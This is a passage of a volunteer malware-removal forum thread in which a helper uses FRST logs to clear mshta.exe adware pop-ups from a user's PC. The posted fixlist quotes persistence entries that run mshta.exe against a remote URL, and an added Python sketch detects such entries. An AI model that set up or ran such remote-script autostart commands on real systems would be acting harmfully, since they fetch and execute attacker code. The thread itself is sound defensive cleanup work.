
mshta.exe virus! can you help pls TB-Psychotic or anyone? [Solved]


  • This topic is locked
72 replies to this topic

#61 ken545

ken545

    Forum God

  • Retired Classroom Teacher
  • 23,225 posts
  • Interests:Fighting Malware and cooking some great Italian and TexMex food
  • MVP

Posted 23 June 2014 - 01:02 PM

Let me ask you. Where are you getting these Japanese Porn Site ads? Is it when you open your browser? If so, which one?



 
 
The forum is staffed by volunteers who donate their time and expertise.
If you feel you have been helped, please consider a donation.
donate.gif
 
Find us on Facebook
Please LIKE and SHARE
 
 
Just a reminder that threads will be closed if no reply in 3 days.



#62 ken545

ken545

    Forum God

  • Retired Classroom Teacher
  • 23,225 posts
  • Interests:Fighting Malware and cooking some great Italian and TexMex food
  • MVP

Posted 23 June 2014 - 02:21 PM

We may have found the answer, thanks to Farbar the author of FRST

 

Go ahead and run a new scan with FRST, and I need to see the Addition.txt log also



 
 

#63 kunash

kunash

    Authentic Member

  • Authentic Member
  • PipPip
  • 73 posts

Posted 24 June 2014 - 01:23 AM

I turn the computer on - goes to desktop - and about 10 seconds later it pops up in the bottom right corner. No browsers are open.



#64 kunash

kunash

    Authentic Member

  • Authentic Member
  • PipPip
  • 73 posts

Posted 24 June 2014 - 01:40 AM

You need to see the additions log - is that the original one I posted on page 1?

Previously you said

''the first time the tool (frst) is run it generates another log - additions.txt.''

I have only ever seen this log the first time I ran frst. I have just run frst and only the frst.exe log is produced. Do you want me to delete the frst program and download it again?



#65 ken545

ken545

    Forum God

  • Retired Classroom Teacher
  • 23,225 posts
  • Interests:Fighting Malware and cooking some great Italian and TexMex food
  • MVP

Posted 24 June 2014 - 04:45 AM

No, just go ahead and post a new FRST log, we found out how to get rid of this



 
 

#66 ken545

ken545

    Forum God

  • Retired Classroom Teacher
  • 23,225 posts
  • Interests:Fighting Malware and cooking some great Italian and TexMex food
  • MVP

Posted 24 June 2014 - 05:06 AM

When you open up FRST, put a checkmark in addition.txt and it will create a new addition file. I would rather use a current one if we can.



 
 

#67 ken545

ken545

    Forum God

  • Retired Classroom Teacher
  • 23,225 posts
  • Interests:Fighting Malware and cooking some great Italian and TexMex food
  • MVP

Posted 24 June 2014 - 06:21 AM

When you can, get me the new logs and let's get rid of this pest



 
 

#68 kunash

kunash

    Authentic Member

  • Authentic Member
  • PipPip
  • 73 posts

Posted 24 June 2014 - 07:25 AM

ok here we go........




#69 ken545

ken545

    Forum God

  • Retired Classroom Teacher
  • 23,225 posts
  • Interests:Fighting Malware and cooking some great Italian and TexMex food
  • MVP

Posted 24 June 2014 - 07:54 AM

Thanks for the logs, hopefully this will take care of it

 

Again, if you have an old fixlist.txt log, drag it to the trash.

 

Open notepad (Start =>All Programs => Accessories => Notepad).
Please copy the entire contents of the code box below.
(To do this highlight the contents of the box, right click on it and select copy. Right-click in the open notepad and select Paste).
Save it to the same directory as frst.exe (or frst64.exe) as fixlist.txt.
 
Start
HKU\S-1-5-21-2615214989-2497064625-3642582449-1000\...\Run: [SystemBooteHQ088Vh8yxWhinGduq9jR1yJP8FDAh2] => mshta.exe http://gvn.dogmwijx....yJP8FDAh2&log=1
HKU\S-1-5-21-2615214989-2497064625-3642582449-1000\...\Run: [RegWriteeHQ088Vh8yxWhinGduq9jR1yJP8FDAh2] => mshta.exe http://gvn.dogmwijx....uq9jR1yJP8FDAh2
HKU\S-1-5-21-2615214989-2497064625-3642582449-1000\...\RunOnce: [RegWriteeHQ088Vh8yxWhinGduq9jR1yJP8FDAh2] - mshta.exe http://gvn.dogmwijx....uq9jR1yJP8FDAh2
Task: {4B0556EC-44EC-49B3-967D-83853E99056E} - \Speedial No Task File <==== ATTENTION
Task: {794B6FE8-AB93-47EE-AC9A-021679F6C4C0} - \Digital Sites No Task File <==== ATTENTION
Task: {605B88AA-58C3-42CA-8A38-671AD6887413} - System32\Tasks\RegWrite => mshta.exe http://gvn.dogmwijx....uq9jR1yJP8FDAh2
Task: {79C796C6-C03E-472D-8E39-517211FC7840} - System32\Tasks\SystemBoot => mshta.exe http://gvn.dogmwijx....uq9jR1yJP8FDAh2
Task: {605B88AA-58C3-42CA-8A38-671AD6887413} - System32\Tasks\RegWrite => C:\Windows\system32\mshta.exe [2014-05-08] (Microsoft Corporation)
Task: {79C796C6-C03E-472D-8E39-517211FC7840} - System32\Tasks\SystemBoot => C:\Windows\system32\mshta.exe [2014-05-08] (Microsoft
Hosts:
End
 

 

 
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.
 
Then open FRST64 and click on fix
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.


 
 
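An added example, not part of the original thread and not FRST's own code: the fixlist in post #69 removes every autostart point (Run, RunOnce and scheduled tasks) that launches mshta.exe with a remote URL, and the sketch below shows how the same pattern can be picked out of an FRST-style log. The log lines, SID, GUIDs, value names and the example.invalid host are constructed placeholders, and the function name is hypothetical.

```python
import re

# Constructed sample lines in the log layout shown in post #69.
# SID, GUIDs, names and the example.invalid host are placeholders.
SAMPLE_LOG = r"""
HKU\S-1-5-21-1111111111-2222222222-3333333333-1000\...\Run: [SystemBootAbc123] => mshta.exe http://host.example.invalid/a?id=Abc123&log=1
HKU\S-1-5-21-1111111111-2222222222-3333333333-1000\...\RunOnce: [RegWriteAbc123] - mshta.exe http://host.example.invalid/b?id=Abc123
HKLM\...\Run: [AudioDriver] => C:\Program Files\Vendor\audio.exe [2014-01-01] (Vendor Inc.)
Task: {00000000-0000-0000-0000-000000000001} - System32\Tasks\RegWrite => mshta.exe http://host.example.invalid/b?id=Abc123
Task: {00000000-0000-0000-0000-000000000002} - System32\Tasks\Updater => C:\Program Files\Vendor\update.exe [2014-01-01] (Vendor Inc.)
Task: {00000000-0000-0000-0000-000000000003} - \Orphaned No Task File <==== ATTENTION
"""

# Registry autostart line: key path, [value name], then "=>" or "-" and the command.
RUN_RE = re.compile(
    r"^(?P<key>HK[A-Z]+\\.*?\\(?:Run|RunOnce)): \[(?P<name>[^\]]+)\] (?:=>|-) (?P<cmd>.+)$")
# Scheduled task line that carries a command after "=>".
TASK_RE = re.compile(r"^Task: \{[0-9A-Fa-f-]+\} - (?P<name>.+?) => (?P<cmd>.+)$")
# mshta.exe (bare or with a full path) followed by a remote URL argument.
MSHTA_URL_RE = re.compile(r'(?:^|\\)mshta(?:\.exe)?"?\s+"?(?P<url>https?://\S+)', re.I)


def find_mshta_autoruns(log_text):
    """Return autostart entries whose command is mshta.exe with a remote URL."""
    findings = []
    for line in log_text.splitlines():
        line = line.strip()
        match, source = RUN_RE.match(line), "registry"
        if not match:
            match, source = TASK_RE.match(line), "task"
        if not match:
            continue  # not an autostart line, or a task entry with no command
        hit = MSHTA_URL_RE.search(match.group("cmd"))
        if hit:
            findings.append({"source": source,
                             "name": match.group("name"),
                             "url": hit.group("url")})
    return findings


if __name__ == "__main__":
    for entry in find_mshta_autoruns(SAMPLE_LOG):
        print(entry["source"], entry["name"], entry["url"])
```

Finding the same URL under both registry and task entries means each one has to be removed, otherwise a surviving entry can launch it again at the next logon.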

#70 kunash

kunash

    Authentic Member

  • Authentic Member
  • PipPip
  • 73 posts

Posted 24 June 2014 - 09:24 AM

Rebooted and waiting a bit.................

Waiting.....................   ( for the pop up )

Nothing yet

Still waiting..................

Just to be certain

I think you have cracked it. No pop up.

Excellent.

Thank you very much for your time and patience and help.

As a thank you I will make a donation via PayPal to help fund the website.

Thanks again

( I will post in the next few days about my wife's computer )



#71 ken545

ken545

    Forum God

  • Retired Classroom Teacher
  • 23,225 posts
  • Interests:Fighting Malware and cooking some great Italian and TexMex food
  • MVP

Posted 24 June 2014 - 09:29 AM

Great, let's give it another day. Use your computer normally and let me know how it's going.



 
 

#72 ken545

ken545

    Forum God

  • Retired Classroom Teacher
  • 23,225 posts
  • Interests:Fighting Malware and cooking some great Italian and TexMex food
  • MVP

Posted 24 June 2014 - 11:12 AM

Thank You :)



 
 

#73 ken545

ken545

    Forum God

  • Retired Classroom Teacher
  • 23,225 posts
  • Interests:Fighting Malware and cooking some great Italian and TexMex food
  • MVP

Posted 30 June 2014 - 06:02 AM

Since this issue appears to be resolved ... this Topic has been closed. Glad we could be of assistance.

If you're the topic starter, and need this topic reopened, please contact a staff member with the address of the thread.

Everyone else please follow the instructions here http://forums.whatth...ed_t106388.html
and start a New Topic.

 
 
